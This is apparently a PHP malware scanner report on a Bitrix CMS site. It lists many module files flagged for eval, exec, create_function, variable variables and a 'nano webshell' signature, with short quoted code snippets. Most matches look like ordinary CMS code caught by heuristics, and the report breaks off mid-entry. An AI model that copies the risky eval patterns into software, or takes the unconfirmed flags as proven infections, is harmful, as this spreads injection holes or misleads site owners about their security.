/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/nokeep.php Size: 606.00 B Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/options.php Size: 37.59 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Warns: 2
| Description | Match |
|---|
Exploit double_var2 Line: 378 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($func); } } } } COption::SetOptionString($module_id, "IP_LOOKUP_CLASS", $IP_LOOKUP_CLASS); COption::SetOptionString($module_id, "ADV_EVENTS_DEFAULT", $ADV_EVENTS_DEFAULT); COption::SetOptionString($module_id, "USE_AUTO_OPTIMIZE", $USE_AUTO_OPTIMIZE); InitBVar($recount_base_currency); if ($recount_base_currency=="Y") CStatistics::RecountBaseCurrency($BASE_CURRENCY); COption::SetOptionString($module_id, "BASE_CURRENCY", $BASE_CURRENCY); $arr = array(); $arr = preg_split("/[\n\r]+/", $BROWSERS...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/stat_tools.php Size: 45.08 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 513 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/classes/general/traffic.php Size: 2.67 kB Created: 2023-03-11 16:43:02 Modified: 2023-11-27 14:53:30 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 61 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/ip_tools.php Size: 8.18 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 67 Warning Double var technique is usually used for the obfuscation of malicious code |
${$value}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_graph_legend.php Size: 813.00 B Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/graph_legend.php Size: 1.05 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/attentiveness_graph.php Size: 3.35 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/country_graph.php Size: 3.18 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_graph_1.php Size: 5.62 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/event_diagram.php Size: 1.76 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/attentiveness_diagram.php Size: 1.66 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/country_diagram.php Size: 1.77 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/city_list.php Size: 10.43 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/searcher_diagram_list.php Size: 6.83 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/event_diagram_list.php Size: 7.14 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/visit_section_list.php Size: 15.00 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/section_graph.php Size: 3.90 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/traffic.php Size: 14.76 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/visit_section_diagram.php Size: 2.03 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_graph_list.php Size: 13.67 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/searcher_graph_list.php Size: 6.89 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/searcher_graph.php Size: 3.32 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_graph_2.php Size: 4.21 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/traffic_graph.php Size: 7.94 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/event_graph.php Size: 3.39 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/city_diagram.php Size: 1.44 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/section_graph_list.php Size: 6.06 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/attentiveness_list.php Size: 7.52 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/searcher_diagram.php Size: 1.57 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_analysis_graph.php Size: 4.21 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/event_graph_list.php Size: 8.17 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/country_list.php Size: 14.00 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/adv_analysis.php Size: 13.51 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/admin/city_graph.php Size: 3.13 kB Created: 2023-03-11 16:42:59 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/install/gadgets/bitrix/admin_stat/index.php Size: 11.57 kB Created: 2023-03-11 16:43:02 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/statistic/install/index.php Size: 13.90 kB Created: 2023-03-11 16:43:02 Modified: 2023-11-27 14:53:30 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrix.sitepersonal/install/wizards/bitrix/demo_personal/site/services/main/template.php Size: 2.93 kB Created: 2023-03-11 16:38:17 Modified: 2023-11-27 14:53:22 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/mail/classes/general/mail.php Size: 99.50 kB Created: 2023-03-11 16:39:39 Modified: 2023-11-27 14:53:26 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit silenced_eval Line: 2458 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($code)
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$m', "return CMailHeader::ConvertHeader(\$m[1], \$m[2], \$m[3], '".AddSlashes($charset_to)."');"), $str ); } return $str; } function Parse($message_header, $charset) { if(preg_match("'content-type:.*?charset=([^\r\n;]+)'is", $message_header, $res)) $this->charset = strtolower(trim($res[1], ' "')); elseif($this->charset=='' && defined("BX_MAIL_DEFAULT_CHARSET")) $this->charset = BX_MAIL_DEFAULT_CHARSET; $ar_message_header_tmp = explode("\r\n", $message_header); $n = -1; $bConvert...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($code); ob_end_clean(); if($php_errormsg != "") CMailError::SetError("B_MAIL_ERR_PHP", GetMessage("MAIL_CL_ERR_IN_PHP").$field_name.". (".$php_errormsg.")"); $php_errormsg = $php_errormsg_prev; ini_set("track_errors", $prev); } function CheckFields($arFields, $ID=false) { $err_cnt = CMailError::ErrCount(); $arMsg = Array(); if(is_set($arFields, "NAME") && strlen($arFields["NAME"])<1) { CMailError::SetError("B_MAIL_ERR_NAME", GetMessage("MAIL_CL_ERR_NAME")." \"".GetMessage("MAIL_CL_NAME")."\...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/mail/admin/mail_smtpd_manager.php Size: 2.44 kB Created: 2023-03-11 16:39:39 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $op); } } if (strlen($startErrorMessage) <= 0) $res = "success"; else $res = $startErrorMessage; break; case 'stop': $CACHE_MANAGER->Read(3600000, $cache_id = "smtpd_stop"); $CACHE_MANAGER->Set($cache_id, true); break; case 'stats': $res = false; if($CACHE_MANAGER->Read(3600000, $cache_id = "smtpd_stats")) { $res = $CACHE_MANAGER->Get($cache_id); $res["uptime"] = time() - $res["started"]; } break; } echo CUtil::PhpToJSObject($res, false); ?>
<? require($_SERVER["DOCUMENT_ROOT"].BX_ROO...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/mail/admin/mail_message_view.php Size: 11.30 kB Created: 2023-03-11 16:39:39 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$m', "return _ConvReplies(\$m[2], \$m[4]);"), TxtToHTML($dbr_arr["BODY"]))?></td>
</tr>
<? if($dbr_arr["ATTACHMENTS"]>0): $dbr_attach = CMailAttachment::GetList(Array("NAME"=>"ASC", "ID"=>"ASC"), Array("MESSAGE_ID"=>$dbr_arr["ID"])); ?>
<tr>
<td><?echo GetMessage("MAIL_MSG_VIEW_ATTACHMENTS")?></td>
<td>
<?while($dbr_attach_arr = $dbr_attach->GetNext()):?>
<a target="_blank" href="mail_attachment_view.php?lang=<?=LANG?>&ID=<?=$dbr_attach_arr["ID"]?>"><?=(strlen($d...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/ldap/options.php Size: 5.41 kB Created: 2023-03-11 16:37:33 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 78 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/ldap/admin/ldap_server_edit.php Size: 30.89 kB Created: 2023-03-11 16:37:34 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', '$a=ToUpper($a);$b=ToUpper($b); if($a==$b) return 0; return $a>$b?1:-1;')); } if(!is_array($arLDAPGroups) || count($arLDAPGroups)<=0):?>
<script type="text/javascript">
function CheckNAttr()
{
if(document.getElementById("GROUP_FILTER").value.length<=0 ||
document.getElementById("GROUP_ID_ATTR").value.length<=0 ||
document.getElementById("GROUP_NAME_ATTR").value.length<=0
)
{
alert('<?=GetMessage("LDAP_EDIT_WARN")?>');
return false;
}
return tr...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/wiki/options.php Size: 6.00 kB Created: 2023-03-11 16:41:56 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 75 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/wiki/install/components/bitrix/wiki.edit/templates/.default/template.php Size: 10.11 kB Created: 2023-03-11 16:41:54 Modified: 2023-11-27 14:53:31 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/wiki/install/components/bitrix/wiki.edit/templates/.default/dialogs_content.php Size: 10.70 kB Created: 2023-03-11 16:41:54 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/learning/admin/learn_unilesson_edit.php Size: 48.10 kB Created: 2023-03-11 16:39:22 Modified: 2023-11-27 14:53:26 Warns: 2
| Description | Match |
|---|
Exploit double_var2 Line: 508 Warning Double var technique is usually used for the obfuscation of malicious code |
${$varName}
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('JSConfig = ' + b4); } catch (e) { JSConfig = false; }
if (!id || !JSConfig)
return '';
var w = (parseInt(JSConfig.width) || 50);
var h = (parseInt(JSConfig.height) || 25);
var arTagParams = {file: JSConfig.file};
var bxTag = pMainObj.GetBxTag(id);
if (bxTag && bxTag && bxTag.tag == "media")
{
arTagParams.id = id;
}
return '<img id="' + pMainObj.SetBxTag(false, {tag: 'media', params: arTagParams}) + '" src="/bitrix/images/1.gif" style="border: 1px sol...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/learning/admin/learn_course_edit.php Size: 21.36 kB Created: 2023-03-11 16:39:21 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 341 Warning Double var technique is usually used for the obfuscation of malicious code |
${$varName}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/learning/admin/learn_question_edit.php Size: 38.87 kB Created: 2023-03-11 16:39:21 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('JSConfig = ' + b4); } catch (e) { JSConfig = false; }
if (!id || !JSConfig)
return '';
var w = (parseInt(JSConfig.width) || 50);
var h = (parseInt(JSConfig.height) || 25);
var arTagParams = {file: JSConfig.file};
var bxTag = pMainObj.GetBxTag(id);
if (bxTag && bxTag && bxTag.tag == "media")
{
arTagParams.id = id;
}
return '<img id="' + pMainObj.SetBxTag(false, {tag: 'media', params: arTagParams}) + '" src="/bitrix/images/1.gif" style="border: 1px sol...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/learning/install/index.php Size: 18.45 kB Created: 2023-03-11 16:39:17 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/socialservices/classes/general/authmanager.php Size: 42.56 kB Created: 2023-03-11 16:39:37 Modified: 2023-11-27 14:53:30 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/options.php Size: 83.81 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+result+')' );
var el = BX(res);
BX(res).setAttribute('class', 'adm-btn');
if (el.bxwaiter && el.bxwaiter.parentNode)
{
el.bxwaiter.parentNode.removeChild(el.bxwaiter);
el.bxwaiter = null;
}
el.disabled = false;
}
}
</script>
<? } $systemTabControl = new CAdminTabControl("tabControl2", $aTabs, true, true); $systemTabControl->Begin(); $systemTabControl->BeginNextTab(); ?><tr><td align="left"><? $arAgentInfo = false; $rsAgents = CAgent::GetList(array(),array('...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/general/discount.php Size: 117.28 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('return '.$strUnpack.';'); } protected function __ConvertOldConditions($strAction, &$arFields) { $strAction = ToUpper($strAction); if (!is_set($arFields, 'CONDITIONS')) { $arConditions = array( 'CLASS_ID' => 'CondGroup', 'DATA' => array( 'All' => 'AND', 'True' => 'True', ), 'CHILDREN' => array(), ); $intEntityCount = 0; $arIBlockList = self::__ConvertOldOneEntity($arFields, 'IBLOCK_IDS'); if (!empty($arIBlockList)) { $intEntityCount++; } $arSectionList = self::__ConvertOldOneEntity($arField...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/general/catalog_import.php Size: 10.27 kB Created: 2023-03-11 16:39:07 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/general/catalog_export.php Size: 10.15 kB Created: 2023-03-11 16:39:07 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load_import/cron_frame.php Size: 3.51 kB Created: 2023-03-11 16:39:07 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load_import/commerceml_g_run.php Size: 61.72 kB Created: 2023-03-11 16:39:07 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load_import/commerceml_run.php Size: 30.33 kB Created: 2023-03-11 16:39:07 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load/yandex_run.php Size: 53.55 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:24 Dangers: 4
| Description | Match |
|---|
Exploit download_remote_code2 Line: 897 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, 'if (!isset($_GET["referer1"])
| Exploit download_remote_code2 Line: 898 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '$strReferer1 = htmlspecialchars($_GET["referer1"])
| Exploit download_remote_code2 Line: 899 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, 'if (!isset($_GET["referer2"])
| Exploit download_remote_code2 Line: 900 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '$strReferer2 = htmlspecialchars($_GET["referer2"])
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load/yandex_detail.php Size: 31.32 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load/cron_frame.php Size: 3.43 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/load/yandex_simple_run.php Size: 12.09 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:24 Dangers: 4
| Description | Match |
|---|
Exploit download_remote_code2 Line: 90 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '<?if (!isset($_GET["referer1"])
| Exploit download_remote_code2 Line: 97 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '<? $strReferer1 = htmlspecialchars($_GET["referer1"])
| Exploit download_remote_code2 Line: 98 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '<?if (!isset($_GET["referer2"])
| Exploit download_remote_code2 Line: 99 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, '<? $strReferer2 = htmlspecialchars($_GET["referer2"])
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/admin/cat_discount_edit.php Size: 25.96 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/admin/cat_product_search.php Size: 9.63 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("window.opener.document.<?= $form_name ?>.<?= $field_name ?>");
if(el)
el.value = id;
<?if (strlen($field_name_name) > 0):?>
el = eval("window.opener.document.<?= $form_name ?>.<?= $field_name_name ?>");
if(el)
el.value = name;
<?endif;?>
<?if (strlen($field_name_url) > 0):?>
el = eval("window.opener.document.<?= $form_name ?>.<?= $field_name_url ?>");
if(el)
el.value = url;
<?endif;?>
<?if (strlen($alt_name) > 0):?>
el = window.opener.document.getEleme...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/admin/export_setup.php Size: 62.79 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:23 Warns: 1 Dangers: 5
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/admin/cat_store_document_edit.php Size: 42.45 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( '('+result+')' );
if(res['id'] > 0)
{
res['quantity'] = 1;
obProductAdd = BX('productAdd');
if (!!obProductAdd)
obProductAdd.disabled = true;
addRow(null, res, null, arBarCodes);
}
}
}
function enterBarcodes(id)
{
var amount;
if(BX('CAT_DOC_AMOUNT_HIDDEN_'+id))
amount = parseInt(BX('CAT_DOC_AMOUNT_HIDDEN_'+id).value, 10);
else
amount = 0;
if(isNaN(amount))
amount = 0;
maxId = amount;
var
content = BX.create('DIV', {
props: {i...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/admin/import_setup.php Size: 60.54 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:23 Warns: 1 Dangers: 5
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/tools/iblock_subelement_generator.php Size: 29.82 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(arFileProperties),
id = 0;
if(BX('ib_seg_max_property_id'))
{
id = BX('ib_seg_max_property_id').value;
if(id >= obPropertyTable.AR_FILE_PROPERTIES.length + 2)
{
return;
}
BX('ib_seg_max_property_id').value = Number(BX('ib_seg_max_property_id').value) + 1;
}
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';
var propertySpan = BX('ib_seg_property_span');
if(propertySpan)
{
var options = [];
for(var key in fileProperties)
{
if(fileProperties....
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/load/cron_frame.php Size: 3.27 kB Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/admin/cat_section_admin.php Size: 129.00 B Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/admin/cat_product_list.php Size: 126.00 B Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/admin/cat_section_edit.php Size: 128.00 B Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/admin/cat_product_admin.php Size: 129.00 B Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/admin/cat_product_edit.php Size: 128.00 B Created: 2023-03-11 16:39:08 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/catalog/install/index.php Size: 25.48 kB Created: 2023-03-11 16:39:13 Modified: 2023-11-27 14:53:23 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/highloadblock/lib/highloadblock.php Size: 15.35 kB Created: 2023-03-11 16:43:36 Modified: 2023-11-27 14:53:25 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($eval); $entity = $entity_data_class::getEntity(); $uFields = $USER_FIELD_MANAGER->getUserFields('HLBLOCK_'.$hlblock['ID']); foreach ($uFields as $uField) { if ($uField['MULTIPLE'] == 'N') { $field = $USER_FIELD_MANAGER->getEntityField($uField, $uField['FIELD_NAME']); $entity->addField($field); foreach ($USER_FIELD_MANAGER->getEntityReferences($uField, $field) as $reference) { $entity->addField($reference); } } else { static::compileUtmEntity($entity, $uField); } } } return Entity\Base::get...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/workflow/classes/mysql/workflow.php Size: 17.53 kB Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/workflow/classes/general/status.php Size: 9.39 kB Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/workflow/classes/general/workflow.php Size: 28.98 kB Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/workflow/install/index.php Size: 6.52 kB Created: 2023-03-11 16:39:40 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/report/install/components/bitrix/report.view/templates/admin/template.php Size: 55.04 kB Created: 2023-03-11 16:40:14 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('response = ' + data);
if (response)
{
if (response.imageData)
{
if (response.imageData.substr(0,10) === 'data:image')
{
img = BX('report-chart-image');
img.src = response.imageData;
if (response.legendInfo)
{
var legendContainer = BX('report-chart-legend-container');
var legendRowExample = BX('report-chart-legend-row-example');
var chartType = requestData['type'];
var legendNewRow, legendStick, legend...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/report/install/components/bitrix/report.construct/templates/.default/template.php Size: 37.43 kB Created: 2023-03-11 16:40:14 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ySelects[i].name))
{
colId = match[1];
if (colId !== null && yColumnsIndexes[colId] !== null)
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
}
}
var chartCheckbox = BX('report-chart-display-checkbox');
if (chartCheckbox)
{
BX.bind(chartCheckbox, 'click', function () {
var chartSwitchBlock = BX('report-chart-switch');
var chartParamsBlock = BX('report-chart-params');
if (chartSwitchBlock)
{
if (this.checked) BX.addClass(chartSwitchBloc...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/report/install/components/bitrix/report.construct/templates/admin/template.php Size: 39.88 kB Created: 2023-03-11 16:40:14 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ySelects[i].name))
{
colId = match[1];
if (colId !== null && yColumnsIndexes[colId] !== null)
setSelectValue(ySelects[i], yColumnsIndexes[colId]);
}
}
var chartCheckbox = BX('report-chart-display-checkbox');
if (chartCheckbox)
{
BX.bind(chartCheckbox, 'click', function () {
var chartSwitchBlock = BX('report-chart-switch');
var chartParamsBlock = BX('report-chart-params');
if (chartSwitchBlock)
{
if (this.checked) BX.addClass(chartSwitchBloc...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/conversion/lib/ratemanager.php Size: 697.00 B Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 31 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$type['CALCULATE']($counters)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php Size: 9.64 kB Created: 2023-03-11 16:41:50 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var result = " + data + "; "); }
if (result['status'] == 'inprogress')
{
document.getElementById('photogallery_recalc').innerHTML = result['text'];
if (__this_source.bReady == false)
{
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
}
else
{
document.getEleme...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php Size: 12.60 kB Created: 2023-03-11 16:41:52 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
